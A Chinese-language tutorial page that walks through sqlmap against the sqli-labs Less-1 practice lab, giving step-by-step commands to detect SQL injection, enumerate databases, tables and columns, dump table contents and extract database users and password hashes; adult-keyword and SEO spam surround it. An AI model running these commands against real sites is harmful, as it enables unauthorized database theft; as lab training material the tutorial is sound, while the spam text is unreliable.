国产成人精品亚洲777人妖,欧美日韩精品一区视频,最新亚洲国产,国产乱码精品一区二区亚洲

您的位置:首頁技術文章
文章詳情頁

SQL注入之sqlmap入門學習

瀏覽:4日期:2023-05-02 10:03:12
目錄
  • 一、判斷是否存在注入點
  • 二、查詢當前用戶下所有數據庫
  • 三、獲取數據庫中的表名
  • 四、獲取表中的字段名
  • 五、獲取字段內容
  • 六、獲取數據庫的所有用戶
  • 七、獲取數據庫用戶的密碼
  • 八、獲取當前網站數據庫的名稱
  • 九、獲取當前網站數據庫的用戶名稱

原來sql注入如此簡單

以SQL注入靶場sqli-labs第一關為例,進行sqlmap工具的使用分享。

一、判斷是否存在注入點

使用命令:

使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"

有圖中白色背景的 則判斷出有注入點

二、查詢當前用戶下所有數據庫

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五個表

三、獲取數據庫中的表名

選取一個challenges數據庫,獲取此庫的表名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables  

四、獲取表中的字段名

選取表T5M0QG6FM2,獲取其中字段名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、獲取字段內容

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、獲取數據庫的所有用戶

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用該命令就可以列出所有管理用戶

七、獲取數據庫用戶的密碼

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、獲取當前網站數據庫的名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到當前的數據庫是 security

九、獲取當前網站數據庫的用戶名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

當前用戶是root

到此這篇關于SQL注入之sqlmap入門學習的文章就介紹到這了,更多相關sqlmap入門內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: MsSQL
主站蜘蛛池模板: 临猗县| 库尔勒市| 仪征市| 石狮市| 冷水江市| 宜宾市| 龙山县| 临城县| 霍山县| 城口县| 吉木乃县| 大埔区| 华安县| 稷山县| 二连浩特市| 井陉县| 涞水县| 陇西县| 志丹县| 汉中市| 出国| 淳化县| 景德镇市| 托克托县| 娱乐| 成武县| 广昌县| 宜都市| 榆社县| 如皋市| 汉川市| 侯马市| 彭泽县| 阳曲县| 仪征市| 三穗县| 黎川县| 锦州市| 财经| 太仓市| 浦北县|